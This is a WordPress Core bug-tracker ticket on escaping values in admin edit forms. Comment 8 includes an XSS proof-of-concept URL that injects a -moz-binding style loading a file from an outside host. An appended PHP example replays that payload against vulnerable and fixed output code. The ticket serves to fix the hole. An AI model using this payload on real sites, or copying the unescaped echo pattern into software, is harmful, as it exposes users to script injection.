Make WordPress Core

Opened 8 years ago

Closed 8 years ago

#4333 closed defect (bug) (fixed)

Some attribute_escape()s and relatives for edit forms

Reported by: mdawaffe
Owned by:
Milestone: 2.2.1
Priority: high
Severity: normal
Version: 2.2
Component: Administration
Keywords:
Focuses:
Cc:

Attachments (3)

4333.diff (19.3 KB) - added by mdawaffe 8 years ago.
UserEdit_Fix_Trunk.patch (653 bytes) - added by g30rg3x 8 years ago.
User-Edit.php Fix for trunk
Fix_22.patch (17.5 KB) - added by g30rg3x 8 years ago.
Patch for milestone 2.2, based on trunk changeset #5543


Change History (14)

@mdawaffe 8 years ago

comment:1 @ryan 8 years ago

The int casts can go in get_category_to_edit() and the other to_edit() functions since we always want them to be ints. attribute_escape() needs more context, so calling it from the forms is good.

comment:2 @rob1n 8 years ago

  • Owner changed from anonymous to rob1n

Also, looks like we could use some selected()'s in there.

comment:3 @ryan 8 years ago

(In [5543]) attribute_escape()s and int casts. see #4333

comment:4 @rob1n 8 years ago

  • Resolution set to fixed
  • Status changed from new to closed

Looks like those <select>'s options aren't going to work with selected().

comment:5 @markjaquith 8 years ago

  • Milestone changed from 2.3 to 2.2.1
  • Resolution fixed deleted
  • Status changed from closed to reopened

Also needs to go into 2.2.1 and 2.0.11

comment:6 @markjaquith 8 years ago

(In [5550]) attribute_escape()s and int casts for 2.0.x: see #4333

comment:7 @markjaquith 8 years ago

2.2.1 remains.

comment:8 @g30rg3x 8 years ago

Well, I made some trunk-based patches for 2.2.
Obviously I don't add anything that has to be related to the trunk version.

Also, I think that the trunk solution is incomplete because it doesn't filter the user-edit.php-based version of the bug:
user-edit.php?user_id=1&wp_http_referer=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'

@g30rg3x 8 years ago

User-Edit.php Fix for trunk

@g30rg3x 8 years ago

Patch for milestone 2.2, based on trunk changeset #5543

comment:9 @rob1n 8 years ago

  • Owner changed from rob1n to anonymous
  • Status changed from reopened to new

comment:10 @markjaquith 8 years ago

(In [5588]) use clean_url(). Nice catch, g30rg3x. see #4333 for trunk
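The user-edit.php case from comment 8 and the output-side fix, as an added example that is not part of the ticket or of WordPress's own code. demo_attribute_escape() and demo_clean_url() are simplified stand-ins written here for attribute_escape() and clean_url(); they are assumed only to reproduce the behaviour relevant to this bug, not the real implementations.

```php
<?php
// Added example (not from the ticket or WordPress): the wp_http_referer value
// from comment 8, echoed raw into a hidden input versus sanitised and escaped
// for the attribute context. The demo_* functions are simplified stand-ins
// for WordPress's attribute_escape() and clean_url(), not the real code.

function demo_attribute_escape(string $s): string {
    // Encode &, <, >, " and ' so the value can never close the attribute.
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function demo_clean_url(string $url): string {
    // Drop characters that cannot appear in a URL at all (double quotes,
    // whitespace, angle brackets, ...). ' ( ) survive because they are legal
    // URL characters, which is why output escaping is still required after.
    return preg_replace('/[^A-Za-z0-9\-._~:\/?#\[\]@!$&\'()*+,;=%]/', '', $url);
}

function hidden_referer_vulnerable(string $referer): string {
    // The pre-fix pattern: request data written straight into an attribute.
    return '<input type="hidden" name="wp_http_referer" value="' . $referer . '" />';
}

function hidden_referer_fixed(string $referer): string {
    // Sanitise as a URL, then escape for the attribute context it lands in.
    return '<input type="hidden" name="wp_http_referer" value="'
        . demo_attribute_escape(demo_clean_url($referer)) . '" />';
}

// Constructed input: the query value from comment 8 after PHP has URL-decoded
// it into $_GET['wp_http_referer'].
$referer = urldecode('%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)\'');

echo hidden_referer_vulnerable($referer), "\n";
// The leading " closes value="" and style=... is parsed as a new attribute.

echo hidden_referer_fixed($referer), "\n";
// Double quotes are removed by the URL clean-up and what remains is
// entity-encoded, so the whole string stays inside value="...".
```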

comment:11 @markjaquith 8 years ago

  • Resolution set to fixed
  • Status changed from new to closed

(In [5589]) Int casting and misc escaping for 2.2 Props g30rg3x. fixes #4333 for 2.2
